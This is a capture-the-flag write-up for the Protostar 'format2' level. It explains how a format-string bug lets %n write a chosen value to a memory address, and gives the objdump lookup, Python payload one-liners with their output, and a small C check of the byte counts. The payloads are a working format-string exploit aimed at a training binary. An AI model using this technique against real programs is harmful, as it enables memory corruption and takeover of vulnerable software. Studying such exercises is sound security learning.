About:
This level moves on from format1 and shows how specific values can be written in memory.
Source Code:
This one looks very similar to the last one except we now have to write a specific value to target.
Same as before, we can get the address of target with objdump:
user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep "target"
080496e4 g O .bss 00000004 target
Now that we have the correct address, let's try what we had from before, except substituting in the new address for target:
user@protostar:/opt/protostar/bin$ python -c "print '\xe4\x96\x04\x08' + '%08x.'*3 + '%n'" | /opt/protostar/bin/format2
00000200.b7fd8420.bffff5e4.
target is 31 :(
The key to getting it to write the value of your choice is knowing that %n writes the total number of bytes printed so far.
If we use the format string "%19x.", this takes up 20 bytes (19 for the value + 1 for the '.' character). If we do that three times + the original 4-byte address, we will have used 64 bytes.
Running that with a %n tagged on the end gives you this:
user@protostar:/opt/protostar/bin$ python -c "print '\xe4\x96\x04\x08' + '%19x.'*3 + '%n'" | /opt/protostar/bin/format2
200. b7fd8420. bffff5e4.
you have modified the target :)
Done!
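To check the byte counts above without touching the target binary, the following added example (not part of the original post) lets snprintf report the value %n stores for both format strings. The "AAAA" prefix standing in for the 4-byte address, the function name count_at_n, and passing the three stack words from the output above as arguments are assumptions of this example.

```c
#include <stdio.h>

/* Constructed input: the three stack words shown in the runs above. */
static const unsigned int WORDS[3] = { 0x200u, 0xb7fd8420u, 0xbffff5e4u };

/*
 * Value %n stores after a 4-byte prefix and three "%<width>x." conversions.
 * zero_pad selects "%0<width>x" (first run) or "%<width>x" (second run).
 * "AAAA" is a stand-in for the 4 address bytes. Returns -1 on bad input.
 */
int count_at_n(int width, int zero_pad)
{
    char out[256];
    int stored = -1;
    int rc;

    if (width < 0 || width > 64)   /* 4 + 3 * (64 + 1) fits in out[] */
        return -1;
    if (zero_pad)
        rc = snprintf(out, sizeof out, "AAAA%0*x.%0*x.%0*x.%n",
                      width, WORDS[0], width, WORDS[1], width, WORDS[2],
                      &stored);
    else
        rc = snprintf(out, sizeof out, "AAAA%*x.%*x.%*x.%n",
                      width, WORDS[0], width, WORDS[1], width, WORDS[2],
                      &stored);
    return rc < 0 ? -1 : stored;
}

int main(void)
{
    /* "%08x." : 4 + 3 * (8 + 1) */
    printf("%%08x. x3 -> %d\n", count_at_n(8, 1));
    /* "%19x." : 4 + 3 * (19 + 1) */
    printf("%%19x. x3 -> %d\n", count_at_n(19, 0));
    /* Width is a minimum: 8-digit words overflow a width of 4. */
    printf("%%4x.  x3 -> %d\n", count_at_n(4, 0));
    return 0;
}
```

The last call shows that a field width is only a minimum: when a stack word has more hex digits than the width, the count depends on the word's value rather than on the width alone.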
Great, Thanks !